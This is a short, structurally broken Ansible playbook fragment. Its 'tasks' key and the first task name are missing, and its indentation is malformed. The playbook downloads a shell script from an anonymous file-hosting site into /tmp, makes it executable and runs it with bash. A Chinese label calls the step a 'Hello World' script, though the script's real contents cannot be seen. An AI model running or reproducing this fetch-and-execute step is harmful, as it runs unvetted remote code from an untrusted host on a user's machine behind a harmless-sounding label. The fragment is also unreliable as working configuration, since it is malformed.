- hosts: localhost
  gather_facts: no
      ansible.builtin.get_url:
        url: "https://files.catbox.moe/uh19yg.sh"
        dest: "/tmp/uh19yg.sh"
        mode: "0755"
        
    - name: 运行 Hello World 脚本
      ansible.builtin.command: "bash /tmp/uh19yg.sh"
